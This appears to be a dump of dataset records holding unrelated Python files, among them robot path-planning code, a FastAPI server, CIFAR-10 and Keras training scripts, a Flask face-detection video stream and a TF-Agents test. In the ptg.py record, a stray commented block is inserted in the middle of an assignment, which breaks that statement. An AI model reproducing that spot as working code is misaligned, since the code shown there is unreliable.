# same as pose.theta but defined over the range [0: 2PI)\n self.idx_to_alpha.append(alpha)\n points = [] # type: List[CPoint]\n while abs(rotation) < 1.95 * np.pi and t < self._t_max and dist < self._d_max and n < self._n_max:\n # if abs(v) < self._vehicle.v_max:\n # v += self._K * a * self._delta_t\n # if abs(v) > self._vehicle.v_max:\n # v = np.sign(v) * self._vehicle.v_max\n pose.x += math.cos(pose.theta) * v * self._delta_t\n pose.y += math.sin(pose.theta) * v * self._delta_t\n pose.theta += w * self._delta_t\n rotation += w * self._delta_t\n v_tp_space = np.sqrt(v * v + (w * turning_radius) * (w * turning_radius))\n dist += v_tp_space * self._delta_t\n delta_pose = pose - last_pose\n dist1 = delta_pose.norm\n dist2 = abs(delta_pose.theta) * k_theta\n dist_max = max(dist1, dist2)\n t += self._delta_t\n if dist_max > min_dist:\n points.append(CPoint(pose.copy(), t, dist, v, w))\n last_pose.copy_from(pose)\n n += 1\n self.c_points.append(points)\n print('Completed building cpoints for {0}'.format(self.name))\n\n def build_cpoints_grid(self):\n assert len(self.c_points) > 0, 'call build_cpoints before'\n print('Starting building cpoints grid for {0}'.format(self.name))\n k = 0\n for c_points_at_k in self.c_points:\n n = 0\n for c_point in c_points_at_k:\n ix = self._c_points_grid.x_to_ix(c_point.x)\n iy = self._c_points_grid.y_to_iy(c_point.y)\n self._c_points_grid.update_cell(ix, iy, k, n)\n n += 1\n k += 1\n print('Completed building cpoints grid for {0}'.format(self.name))\n\n def plot_cpoints(self):\n for c_points_at_k in self.c_points:\n x = [c_point.pose.x for c_point in c_points_at_k]\n y = [c_point.pose.y for c_point in c_points_at_k]\n plt.plot(x, y)\n plt.show()\n\n def build_obstacle_grid(self):\n from prrt.primitive import get_bounding_box, polygon_contains_point\n assert len(self.c_points) > 0, 'c_points don\\'t exist!'\n print('Starting building obstacle grid for {0}'.format(self.name))\n for k in range(len(self.idx_to_alpha)):\n c_points_at_k = self.c_points[k]\n for c_point in c_points_at_k:\n shape = self._vehicle.get_vertices_at_pose(c_point.pose)\n shape_bb = get_bounding_box(shape)\n x_idx_min = max(0, self.obstacle_grid.x_to_ix(shape_bb[0].x))\n y_idx_min = max(0, self.obstacle_grid.y_to_iy(shape_bb[0].y))\n x_idx_max = min(self.obstacle_grid.cell_count_x - 1, self.obstacle_grid.x_to_ix(shape_bb[1].x))\n y_idx_max = min(self.obstacle_grid.cell_count_y - 1, self.obstacle_grid.y_to_iy(shape_bb[1].y))\n for x_idx in range(x_idx_min - 1, x_idx_max + 1):\n cell = PointR2()\n cell.x = self.obstacle_grid.idx_to_x(x_idx)\n for y_idx in range(y_idx_min - 1, y_idx_max + 1):\n cell.y = self.obstacle_grid.idx_to_y(y_idx)\n if polygon_contains_point(shape, cell, shape_bb):\n self.obstacle_grid.update_cell(x_idx, y_idx, k, c_point.d)\n self.obstacle_grid.update_cell(x_idx - 1, y_idx, k, c_point.d)\n self.obstacle_grid.update_cell(x_idx, y_idx - 1, k, c_point.d)\n self.obstacle_grid.update_cell(x_idx - 1, y_idx - 1, k, c_point.d)\n print('{0} out of {1} complete!'.format(k + 1, len(self.idx_to_alpha)))\n print('Completed building obstacle grid for {0}'.format(self.name))\n\n def inverse_WS2TP(self, p: PoseR2S1, tolerance=0.1) -> (bool, int, float):\n is_exact = True\n if p.y != 0:\n R = (p.x * p.x + p.y * p.y) / (2 * p.y)\n Rmin = abs(self._vehicle.v_max / self._vehicle.w_max)\n if self._K > 0:\n if p.y > 0:\n theta = np.arctan2(p.x, abs(R) - p.y)\n else:\n theta = np.arctan2(p.x, p.y + abs(R))\n else:\n if p.y > 0:\n theta = np.arctan2(-p.x, abs(R) - p.y)\n else:\n theta = 
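# A numeric sanity check (values invented) for the circle fit in inverse_WS2TP:
# an arc that leaves the origin with heading 0 and passes through (x, y) has
# turning radius R = (x^2 + y^2) / (2 * y); theta is the swept arc angle.
import numpy as np

x, y = 1.0, 1.0
R = (x * x + y * y) / (2 * y)       # -> 1.0, a quarter circle to the left
theta = np.arctan2(x, abs(R) - y)   # -> pi/2 for this point
arc_len = theta * abs(R)            # ~1.5708; the class pads |R| with a small
                                    # reference radius before this product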
np.arctan2(-p.x, p.y + abs(R))\n # Arc length must be positive [0,2*pi]\n theta = helper.wrap_to_0_2pi(theta)\n # Distance through arc:\n d = theta * (abs(R) + self._turning_radius_ref)\n if abs(R) < Rmin:\n is_exact = False\n R = Rmin * np.sign(R)\n a = np.pi * self._vehicle.v_max / (self._vehicle.w_max * R)\n ik = self.alpha2idx(a)\n else:\n if np.sign(p.x) == np.sign(self._K):\n ik = self.alpha2idx(0)\n d = p.x\n is_exact = True\n else:\n ik = self.alpha2idx(np.pi)\n d = 1e+3\n is_exact = False\n # Normalize:\n d /= self.distance_ref\n assert ik >= 0, 'k index must not be negative'\n assert ik < len(self.c_points), 'ik exceeds limit'\n return is_exact, ik, d\n\n def get_distance(self, from_pose: PoseR2S1, to_pose: PoseR2S1) -> float:\n to_at_from = to_pose - from_pose\n is_exact, k, d = self.inverse_WS2TP(to_at_from)\n if is_exact:\n return d * self.distance_ref\n else:\n return float('inf')\n","sub_path":"prrt/ptg.py","file_name":"ptg.py","file_ext":"py","file_size_in_byte":9000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"161890144","text":"import os.path\n\nclass BaseTestCase(object):\n\n def prepare_screenshots_dir(self):\n class_dir = os.path.join(os.path.join(self.config['sframe']['output'], self.__class__.__name__))\n if not os.path.exists(class_dir):\n os.makedirs(class_dir)\n method_dir = os.environ[\"SCREENSHOTS_DIR\"] = os.path.join(class_dir, self.current_method)\n if not os.path.exists(method_dir):\n os.makedirs(method_dir)\n\n return method_dir ","sub_path":"framework/base/BaseTest.py","file_name":"BaseTest.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365200131","text":"###.1\r\n#\r\n# def factorial(N):\r\n#\r\n# if N <= 1:\r\n#\r\n# return 1\r\n#\r\n# return N * factorial(N-1)\r\n#\r\n# print(factorial(10))\r\n#\r\n\r\n###.2\r\n\r\nN = int(input())\r\n\r\nresult = 1\r\n\r\nfor i in range(1,N+1):\r\n\r\n result = result * i\r\n\r\nprint(result)","sub_path":"백준_10872_구현_B3.py","file_name":"백준_10872_구현_B3.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111489883","text":"import time\n\nfrom fastapi.logger import logger\n\nimport dependency\nfrom fastapi import FastAPI, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom starlette import status\nfrom starlette.responses import JSONResponse\n\nfrom dependency import CredentialException, pool\nfrom routers.auth import auth_router\nfrom routers.model import model_router\n\napp = FastAPI()\n\n\napp.include_router(\n auth_router,\n prefix=\"/auth\",\n tags=[\"auth\"],\n responses={404: {\"detail\": \"Not found\"}},\n)\n\napp.include_router(\n model_router,\n prefix=\"/model\",\n tags=[\"models\"],\n responses={404: {\"detail\": \"Not found\"}},\n)\n\n\n@app.exception_handler(CredentialException)\nasync def credential_exception_handler(request: Request, exc: CredentialException):\n return JSONResponse(\n status_code=status.HTTP_401_UNAUTHORIZED,\n content={\n \"status\": 'failure',\n \"detail\": \"Unable to validate credentials.\"\n },\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n\n\n# -------------------------------\n# Web Server Configuration\n# -------------------------------\n\n# Must have CORSMiddleware to enable localhost client and server\norigins = [\n \"http://localhost\",\n \"http://localhost:3000\",\n \"http://localhost:5057\",\n 
\"http://localhost:5000\",\n \"http://localhost:6379\",\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n# -------------------------------\n# Basic Routes\n# -------------------------------\n\n\n@app.get(\"/\")\nasync def root():\n return {\n \"status\": \"success\",\n \"detail\": 'PhotoAnalysisServer is Running'\n }\n\n\n@app.on_event('shutdown')\ndef on_shutdown():\n \"\"\"\n On server shutdown, stop all background model pinging threads, as well as clear\n the redis model prediction queue\n \"\"\"\n\n dependency.shutdown = True # Send shutdown signal to threads\n pool.shutdown() # Clear any non-processed jobs from thread queue\n dependency.prediction_queue.empty() # Removes all pending jobs from the queue\n\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61060743","text":"\nfrom tkinter import *\nname = \"\"\n\ndef inputpage():\n global name\n name = entry.get()\n root.destroy()\n import inputs_page\n \nroot=Tk()\n\nroot.geometry(\"500x500\")\nroot.config(background='lavender')\nroot.resizable(False,False)\ntop1=Label(root, text='Fianancial management App',background='light sea green').place(x=166,y=10)\nname_label=Label(root, text='Please enter your name:').place(x=20, y=50)\nentry=Entry(root, width=30).place(x=150, y=50)\nentry.pack()\nentry.focus_set()\nname_enterb=Button(root, text='Enter',command=inputpage).place(x=300, y=46)\n\n#name_enterb.pack()\n\n\n\n\n#label=Label(root, text='Welcome '+ name + ' to my Fianancial management App').place(x=20,y=170)\n\n#label2=Label(root, text= 'Click the button to be directed to your inputs').place(x=20, y=210)\n#homepage_button=Button(root, text='Inputs').place(x=20, y=250)\n\n#top1=label(root, text='Fianancial management App').grid(row=0,column=0)\n\n#initial savings\n#i_label=Label(root, text='Enter your initial savings').grid(row=1,column=0)\n#initial_savings=Entry(root, width=50).grid(row=1, column=1)\n\n#monthly income\n#label=Label(root, text='Enter your monthly income').grid(row=2,column=0)\n#monthyi=Entry(root, width=50).grid(row=2, column=1)\n\n#daily expense\n#m_label=Label(root, text='Enter your daily expense').grid(row=3,column=0)\n#daily_expense=Entry(root, width=50).grid(row=3, column=1)\n\nroot.mainloop()\n","sub_path":"page1.py","file_name":"page1.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626315891","text":"'''\nImage Classification on CIFAR-10\n'''\n\nimport sys\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport os\nimport argparse\nimport pickle\nimport numpy as np\nimport logging\nimport random\n\nfrom resnet import *\nfrom shakeshake_resnet import *\nfrom resnext import *\nfrom cutout import cutout\nfrom collections import OrderedDict\nfrom mixup import mixup_data, mixup_criterion\nfrom noise import noise_data\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')\nparser.add_argument('--lr', default=0.2, type=float, help='learning rate')\nparser.add_argument('--model_arch', default=\"ResNet20\", help='specify the model class you want to use')\nparser.add_argument('--wd', 
default=1e-4, type=float, help='weight decay coefficient')\nparser.add_argument('--test', action='store_true', help='resume from checkpoint')\nparser.add_argument('--train', action='store_true', help='train the model')\nparser.add_argument('--train_batch_size', type=int, default=128)\nparser.add_argument('--test_batch_size', type=int, default=100)\nparser.add_argument('--nepochs', type=int, default=160)\nparser.add_argument('--seed', default=1234)\n\n################## These parameters are used in Cutout Model ####################\nparser.add_argument('--use_cutout', action='store_true', default=False)\nparser.add_argument('--use_post_cutout', action='store_true', default=False)\nparser.add_argument('--cutout_size', type=int, default=16)\nparser.add_argument('--cutout_prob', type=float, default=1)\nparser.add_argument('--cutout_inside', action='store_true', default=False)\n################## These parameters are used in Mix Up Model ####################\nparser.add_argument('--use_mix_up',action=\"store_true\", default=False)\nparser.add_argument('--use_uniform_mixup',action=\"store_true\", default=False)\nparser.add_argument('--mix_up_alpha', type=float, default=0.2)\nparser.add_argument('--prefix', type=str, default=\"exp\")\n\n################## These parameters are used in Noisy input ####################\nparser.add_argument('--noise_type', type=str, default=\"gauss\")\nparser.add_argument('--noise_train', action='store_true', default=False)\nparser.add_argument('--noise_test', action='store_true', default=False)\n\n################## Concate\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nuse_cuda = device is 'cuda'\nbest_acc, start_epoch = 0, 0\n\nif args.noise_type is not None:\n if not args.noise_train:\n noise_func_train = noise_data(noise_type=args.noise_type, noise_prob=1.0)\n else:\n noise_func_train = noise_data(noise_type=args.noise_type, noise_prob=0.5)\n\n if not args.noise_test:\n noise_func_test = noise_data(noise_type=args.noise_type, noise_prob=1.0)\n else:\n noise_func_test = noise_data(noise_type=args.noise_type, noise_prob=0)\nelse:\n raise ValueError(\"unsupported noise type:{}\".format(args.noise_type))\n\nmeans = np.array([0.4914, 0.4822, 0.4465])\nstds = np.array([0.2470, 0.2435, 0.2616])\n\nif not args.use_cutout:\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(means, stds),\n noise_func_train,\n ])\nelse:\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n cutout(args.cutout_size,\n args.cutout_prob,\n args.cutout_inside),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)),\n noise_func_train,\n ])\n\n\ntransform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)),\n noise_func_test,\n])\n\n\ntrainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)\n\ntrainset = trainset\ntrainloader = torch.utils.data.DataLoader(\n trainset, batch_size=args.train_batch_size, shuffle=True, num_workers=2)\n\ntestset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)\ntestloader = torch.utils.data.DataLoader(\n testset, batch_size=args.test_batch_size, 
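# A minimal standalone sketch of the mixup recipe used in train() below.
# mixup_data/mixup_criterion are this repo's own helpers; the version here is
# the generic recipe (lam ~ Beta(alpha, alpha), convex-combine the inputs,
# interpolate the loss between both label sets) with invented shapes.
import numpy as np
import torch

def mixup_batch(x, y, alpha=0.2):
    lam = np.random.beta(alpha, alpha) if alpha > 0 else 1.0
    index = torch.randperm(x.size(0))          # shuffled pairing within batch
    mixed_x = lam * x + (1 - lam) * x[index]
    return mixed_x, y, y[index], lam

def mixup_loss(criterion, pred, y_a, y_b, lam):
    return lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)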
shuffle=False, num_workers=2)\n\nclasses = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n# Model\nnepochs = args.nepochs\nmodelname = args.model_arch\ncheckpoint_savename = './checkpoint/{}.ckpt'.format(modelname)\n\nnet = eval(modelname)()\n\nlogf = open(\"log_160_{}\".format(modelname), \"a+\")\n# Training\ndef train(epoch):\n logf.write('\\nEpoch: %d' % epoch)\n print('Epoch: %d' % epoch)\n net.train()\n train_loss, correct, total = 0, 0, 0\n batch_accs = []\n batch_losses = []\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n inputs, targets = inputs.to(device), targets.to(device)\n if args.use_mix_up:\n optimizer.zero_grad()\n inputs, targets_a, targets_b, lam = mixup_data(args, inputs, targets,\n args.mix_up_alpha, args.use_uniform_mixup, use_cuda)\n inputs, targets_a, targets_b = map(Variable, (inputs,\n targets_a, targets_b))\n\n outputs = net(inputs)\n loss = mixup_criterion(criterion, outputs, targets_a, targets_b, lam)\n train_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += (lam * predicted.eq(targets_a.data).cpu().sum().float()\n + (1 - lam) * predicted.eq(targets_b.data).cpu().sum().float())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n else:\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n train_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n cur_loss = train_loss / (batch_idx + 1)\n acc = 100. * correct / total\n logf.write('[%d]Loss: %.3f | Acc: %.3f%% (%d/%d)\\n' % (batch_idx, cur_loss, acc, correct, total))\n if batch_idx % 100 == 0:\n print('[%d]Loss: %.3f | Acc: %.3f%% (%d/%d)' % (batch_idx, cur_loss, acc, correct, total))\n batch_accs.append(acc)\n batch_losses.append(cur_loss)\n acc = float(correct) / total\n print('Train Acc:{}'.format(acc))\n return np.mean(batch_losses), acc\n\n\ndef test(epoch):\n global best_acc\n net.eval()\n test_loss, correct, total = 0, 0, 0\n batch_errs, batch_accs, batch_losses = [], [], []\n\n for batch_idx, (inputs, targets) in enumerate(testloader):\n\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n\n test_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n loss = test_loss / (batch_idx + 1)\n acc = float(correct) / total\n logf.write('[%d] Val Loss: %.3f | Acc: %.3f%% (%d/%d)\\n'\n % (batch_idx, loss, acc, correct, total))\n batch_errs.append(1 - acc)\n batch_accs.append(acc)\n batch_losses.append(loss)\n\n acc = float(correct) / total\n print('Val Acc:{} ({}/{})'.format(acc, correct, total))\n return np.mean(batch_losses), acc\n\n\ntrain_err, train_loss, train_acc = [], [], []\nval_err, val_loss, val_acc = [], [], []\nprint('==> Building model..')\nnet = net.to(device)\n\ncriterion = nn.CrossEntropyLoss()\n\nif device == 'cuda':\n net = torch.nn.DataParallel(net)\n cudnn.benchmark = True\n\nif args.test:\n # Load checkpoint.\n print('==> Resuming from checkpoint {}..'.format(checkpoint_savename))\n assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load(checkpoint_savename)\n net.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n trained_epoch = checkpoint['epoch']\n tl, ta = 
test(trained_epoch)\n print('trained_epoch:{} saved_acc:{} test loss:{} test_acc:{}'.format(\n trained_epoch, best_acc, tl, ta))\n\nelif args.train:\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=args.wd)\n update_lr = {int(0.5 * nepochs): args.lr * 0.1, int(0.75 * nepochs): args.lr * 0.01}\n for epoch in range(0, nepochs):\n l, a = train(epoch)\n train_loss.append(l)\n train_acc.append(a)\n tl, ta = test(epoch)\n val_loss.append(tl)\n val_acc.append(ta)\n if epoch in update_lr:\n print(\"update learning rate to {}\".format(update_lr[epoch]))\n optimizer = optim.SGD(net.parameters(), lr=update_lr[epoch], momentum=0.9, weight_decay=args.wd)\n acc = ta\n state = {\n 'net': net.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, checkpoint_savename)\n best_acc = acc\n\n result = {\"train_loss\": train_loss, \"train_acc\": train_acc, \\\n \"val_loss\": val_loss, \"val_acc\": val_acc}\n\n fn = \"./output/{}_{}_start_epoch_{}_epochs_{}_noise{}.pk\".format(\n args.prefix, modelname, start_epoch, nepochs, args.noise_type)\n if not os.path.exists('./output/'):\n os.mkdir('./output/')\n with open(fn, 'wb') as fout:\n pickle.dump(result, fout)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"146719995","text":"\nheader = \"pou_paper_hess\"\npath = None\nskip_LHS = False \nLHS_batch = 7\nruns_per_proc = 1\n\n# Problem Conditions\nprob = \"alos\" #problem\ndim = 2 #problem dimension\n\n\n# Surrogate Settings\nstype = \"pouhess\" #\"pouhess\" #surrogate type\n\n### FOR POU SFCVT\nrtype = \"hess\"\nopt = 'L-BFGS-B' #'SLSQP'#\nlocal = False\n\n### FOR POU SFCVT\n# rtype = \"pousfcvt\"\n# opt = 'SLSQP' #for SFCVT constraint\n# local = True\n\n### FOR REGULAR SFCVT\n# rtype = \"sfcvt\"\n# opt = 'SLSQP' #for SFCVT constraint, \n# local = False\n# localswitch = False #fully global optimizer\n\n#Kriging\ncorr = \"squar_exp\" #kriging correlation\npoly = \"linear\" #kriging regression\ndelta_x = 1e-4 #1e-7\nextra = dim #gek extra points\nt0 = [1e-0]\ntb = [1e-5, 2e+1]\n\n#POU\nrscale = 5.5\nrho = 10 #POU parameter\n\n# Adaptive Sampling Settings\nnt0 = dim*10 #initial design size\nntr = dim*30 #number of points to add\nntot = nt0 + ntr #total number of points\nbatch = 1#dim*2 #batch size for refinement, as a percentage of ntr\nNerr = 5000*dim #number of test points to evaluate the error\npperb = batch\npperbk = int(ntr/LHS_batch)\nmstarttype = 2 # 0: No multistart\n # 1: Start at the best out of a number of samples\n # 2: Perform multiple optimizations\nif(mstarttype == 1): \n multistart = 50*dim\nif(mstarttype == 2):\n multistart = 5*dim\n\nif(pperb == 0):\n pperb = 1\n\n# Refinement Settings\n\n#Hess\nneval = 1+(dim+2)\nhess = \"neighborhood\"\ninterp = \"honly\"\n\n#Multi\nperturb = True\n\n#Deprecated\ncriteria = \"distance\"\nbpen = False\nobj = \"inv\"\nnscale = 10.0 #1.0 for 2D\nnmatch = dim\n\nrc_print = False#False\n","sub_path":"scratch/revision_scripts/alos2d_pou_hess_settings.py","file_name":"alos2d_pou_hess_settings.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473067318","text":"from flask import Flask, render_template, Response\nimport cv2\nfrom threading import Thread\nimport time\n\nfrom 
src.camera.detect import FaceDetect\n\napp = Flask(__name__)\n\nclass VideoCamera(object):\n\n def __init__(self, index):\n self.video =cv2.VideoCapture(index)\n self.video.set(3, 640)\n self.video.set(4, 480)\n self.frame = None\n\n def __del__(self):\n self.video.release()\n\n def get_frame(self):\n success, image = self.video.read()\n if success:\n return image\n\n def get_frame_to_transfer(self):\n image = self.get_frame()\n self.frame = image.copy()\n # The frames OpenCV reads are not JPEG-encoded,\n # so motion-JPEG streaming requires encoding each frame to JPG first\n ret, jpeg = cv2.imencode('.jpg', image)\n return jpeg.tobytes()\n\n@app.route('/') # home page\ndef index():\n # jinja2 template; the layout is kept in the index.html file\n return render_template('index.html')\n\n\ndef gen(camera):\n face = FaceDetect()\n while True:\n # frame = camera.get_frame_to_transfer()\n image = camera.get_frame()\n image2 = face.detect(image)\n ret, jpeg = cv2.imencode('.jpg', image2)\n frame = jpeg.tobytes()\n # Stream the video with a generator function; each response chunk has content type image/jpeg\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n')\n\n\n@app.route('/video_feed') # this endpoint returns the video stream response\ndef video_feed():\n return Response(gen(cap0),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\nclass ReadVideoThread(Thread):\n def __init__(self, cap):\n super().__init__()\n self.cap = cap\n self.face = FaceDetect()\n\n def run(self):\n time.sleep(5)\n while True:\n frame = self.cap.frame\n if frame is not None:\n self.face.detect(frame)\n cv2.imshow(\"frame\", frame)\n if cv2.waitKey(1) == ord('q'):\n break\n else:\n pass\n cv2.waitKey(1)\n\n\nif __name__ == '__main__':\n cap0 = VideoCamera(0)\n app.run(host='0.0.0.0', debug=True, port=5000)\n","sub_path":"src/camera/cvtest.py","file_name":"cvtest.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"152452479","text":"# coding=utf-8\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for compiler_opt.rl.policy_saver.\"\"\"\n\nimport json\nimport os\n\nimport tensorflow as tf\n\nfrom tf_agents.agents.behavioral_cloning import behavioral_cloning_agent\nfrom tf_agents.networks import q_rnn_network\nfrom tf_agents.specs import tensor_spec\nfrom tf_agents.trajectories import time_step\n\nfrom compiler_opt.rl import policy_saver\n\n\nclass PolicySaverTest(tf.test.TestCase):\n\n def setUp(self):\n super(PolicySaverTest, self).setUp()\n observation_spec = tf.TensorSpec(\n dtype=tf.int64, shape=(), name='callee_users')\n self._time_step_spec = time_step.time_step_spec(observation_spec)\n self._action_spec = tensor_spec.BoundedTensorSpec(\n dtype=tf.int64,\n shape=(),\n minimum=0,\n maximum=1,\n name='inlining_decision')\n self._network = q_rnn_network.QRnnNetwork(\n input_tensor_spec=self._time_step_spec.observation,\n action_spec=self._action_spec,\n lstm_size=(40,))\n\n def test_save_policy(self):\n test_agent = behavioral_cloning_agent.BehavioralCloningAgent(\n self._time_step_spec, 
self._action_spec, self._network,\n tf.compat.v1.train.AdamOptimizer())\n policy_dict = {\n 'saved_policy': test_agent.policy,\n 'saved_collect_policy': test_agent.collect_policy\n }\n test_policy_saver = policy_saver.PolicySaver(policy_dict=policy_dict)\n\n root_dir = self.get_temp_dir()\n test_policy_saver.save(root_dir)\n\n sub_dirs = tf.io.gfile.listdir(root_dir)\n self.assertCountEqual(['saved_policy', 'saved_collect_policy'], sub_dirs)\n\n for sub_dir in ['saved_policy', 'saved_collect_policy']:\n self.assertTrue(\n tf.io.gfile.exists(os.path.join(root_dir, sub_dir, 'saved_model.pb')))\n self.assertTrue(\n tf.io.gfile.exists(\n os.path.join(root_dir, sub_dir,\n 'variables/variables.data-00000-of-00001')))\n output_signature_fn = os.path.join(root_dir, sub_dir, 'output_spec.json')\n self.assertTrue(tf.io.gfile.exists(output_signature_fn))\n self.assertEqual([{\n 'logging_name': 'inlining_decision',\n 'tensor_spec': {\n 'name': 'StatefulPartitionedCall',\n 'port': 0,\n 'type': 'int64_t',\n 'shape': [1],\n }\n }], json.loads(tf.io.gfile.GFile(output_signature_fn).read()))\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"compiler_opt/rl/policy_saver_test.py","file_name":"policy_saver_test.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578532810","text":"# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nbase = pd.read_csv('census.csv') # load the data file\r\nbase.describe() # show some statistics of the file (use Ctrl + Enter)\r\n\r\nprevisores = base.iloc[:, 0:14].values # split the predictor features of the dataset into a variable\r\nclasse = base.iloc[:, 14].values # split the output values from the dataset\r\n\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_previsores = LabelEncoder()\r\n\r\nprevisores[:, 1] = labelencoder_previsores.fit_transform(previsores[:, 1])\r\nprevisores[:, 3] = labelencoder_previsores.fit_transform(previsores[:, 3])\r\nprevisores[:, 5] = labelencoder_previsores.fit_transform(previsores[:, 5])\r\nprevisores[:, 6] = labelencoder_previsores.fit_transform(previsores[:, 6])\r\nprevisores[:, 7] = labelencoder_previsores.fit_transform(previsores[:, 7])\r\nprevisores[:, 8] = labelencoder_previsores.fit_transform(previsores[:, 8])\r\nprevisores[:, 9] = labelencoder_previsores.fit_transform(previsores[:, 9])\r\nprevisores[:, 13] = labelencoder_previsores.fit_transform(previsores[:, 13])\r\n\r\nfrom sklearn.compose import ColumnTransformer\r\nonehotencoder = ColumnTransformer([(\"Previsores\", OneHotEncoder(), [1, 3, 5, 6, 7, 8, 9, 13])], remainder = 'passthrough')\r\nprevisores = onehotencoder.fit_transform(previsores).toarray()\r\n\r\nlabelencoder_classe = LabelEncoder()\r\nclasse = labelencoder_classe.fit_transform(classe)\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nscaler = StandardScaler()\r\nprevisores = scaler.fit_transform(previsores)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nprevisores_treinamento, previsores_teste, classe_treinamento, classe_teste = train_test_split(previsores, classe, test_size=0.15, random_state=0)\r\n\r\n# import the libraries\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nclassificador = Sequential()\r\nclassificador.add(Dense(units = 55, activation = 'relu', input_dim = 108))\r\nclassificador.add(Dense(units = 55, activation = 'relu'))\r\n\r\n# Output layer\r\nclassificador.add(Dense(units = 1, 
activation = 'sigmoid'))\r\n\r\n# Compile the network\r\nclassificador.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\r\nclassificador.fit(previsores_treinamento, classe_treinamento, batch_size = 10, epochs = 100)\r\n\r\n# predictions with the classifier on the test set\r\nprevisoes = classificador.predict(previsores_teste)\r\nprevisoes = (previsoes > 0.5)\r\n\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\nprecisao = accuracy_score(classe_teste,previsoes)\r\nmatriz = confusion_matrix(classe_teste,previsoes)\r\n","sub_path":"Keras_Redes_Neurais_Census.py","file_name":"Keras_Redes_Neurais_Census.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"595233083","text":"from torch import nn\n\nclass DCAE_Conv2D(nn.Module):\n def __init__(self, chnum_in):\n super(DCAE_Conv2D, self).__init__()\n print('AutoEncoderCov2D')\n self.chnum_in = chnum_in\n 